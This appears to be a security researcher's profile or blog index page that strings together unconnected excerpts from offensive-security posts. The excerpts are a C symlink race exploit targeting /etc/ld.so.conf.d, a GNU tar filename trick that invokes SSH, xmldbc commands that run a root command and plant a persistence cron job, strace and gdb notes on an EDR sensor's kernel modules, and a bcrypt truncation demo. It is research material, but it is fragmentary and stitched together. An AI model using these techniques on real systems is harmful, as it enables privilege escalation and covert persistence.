Tim Brown timb-machine

$ ssh sshgw.stromberg.org The authenticity of host ‘sshgw.stromberg.org (136.47.201.206)’ can’t be established. RSA key fingerprint is SHA256:VqUUSiSuOQhm+3vrJG9VDb4fWa2dM23Th23T9D88+L4. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added ‘sshgw.stromberg.org’ (RSA) to the list of known hosts. OpenBSD 7.3 (GENERIC.MP) #0: Thu May 18 19:05:43 MDT 2023

Welcome to OpenBSD: The proactively secure Unix-like operating system.

	#include <unistd.h>
	#include <stdio.h>

	int main(int argc, char **argv) {
	while (symlink(argv[2], argv[1])) {
	}
	printf("w00t!\n");
	}

	$ ./sploit /var/opt/XXXXNN-XXX/XXXX/XXX/XNN.XXXXX /etc/ld.so.conf.d/pwnies.conf
	w00p!
	$ ls -la /etc/ld.so.conf.d/pwnies.conf
	-rw-r--r-- 1 root root 101 Oct 19 15:32 /etc/ld.so.conf.d/pwnies.conf

	$ tar --version
	tar (GNU tar) 1.34
	Copyright © 2021 Free Software Foundation, Inc.
	Licence GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
	This is free software: you are free to change and redistribute it.
	There is NO WARRANTY, to the extent permitted by law.

	Written by John Gilmore and Jay Fenlason.
	$ tar ztvf file\:M.m.p.tar.gz
	The authenticity of host 'file (192.168.67.59)' can't be established.

	$ python3 PiKC.py

	=== System Parameters Summary ===
	System Role: web server
	Open Ports: [80, 443, 8080]
	IP Addresses: ['203.0.113.50']
	Software: Apache httpd 2.4.54
	Interactive User: False
	Critical Asset: False
	Virtualized: False

	If you don't need persistence, why work so hard?

	$ rm /foo; xmldbc -t "test:10:touch /foo"; ls -la /foo; xmldbc -D /tmp/config.xml; sleep 20; ls -la /foo
	ls: /foo: No such file or directory
	-rw-r--r-- 1 root root 0 Jun 5 22:11 /foo

	Say for exmaple, you wanted a cron entry that would run persist.sh every 5 minutes...

	$ xmldbc -s /system_mgr/crond/list/count "9"
	$ xmldbc -s /system_mgr/crond/list/name:9 "persist"
	$ xmldbc -s /system_mgr/crond/persist/count "1"
	$ xmldbc -s /system_mgr/crond/persist/item:1/method "3"
	$ xmldbc -s /system_mgr/crond/persist/item:1/1 "*/5"
	$ xmldbc -s /system_mgr/crond/persist/item:1/2 "*"
	$ xmldbc -s /system_mgr/crond/persist/item:1/3 "*"
	$ xmldbc -s /system_mgr/crond/persist/item:1/4 "*"

	Falcon-sensor strace:

	1185 init_module(0x556ce33f8b00, 204357, "") = 0
	1185 init_module(0x556ce3430940, 122757, "") = 0
	1185 init_module(0x556ce342a950, 24541, "") = 0
	1185 init_module(0x7f33243be010, 1718317, "configbuild=1007.8.0012905.1") = 0

	(gdb) catch syscall init_module
	(gdb) run
	…

	<?php
	if (password_hash("123567890123567890123567890123567890123567890123567890123567890123456789" . "test", PASSWORD_BCRYPT, ["salt" => "1234567890123456789012"]) === password_hash("123567890123567890123567890123567890123567890123567890123567890123456789" . "hell", PASSWORD_BCRYPT, ["salt" => "1234567890123456789012"])) {
	print "matches\n";
	}
	?>

	platformtags:
	- "linux"
	checks:
	- type: "Informational"
	checks:
	- name: "Platform"
	exec:
	- command: "uname"
	stderr: true
	encode: ""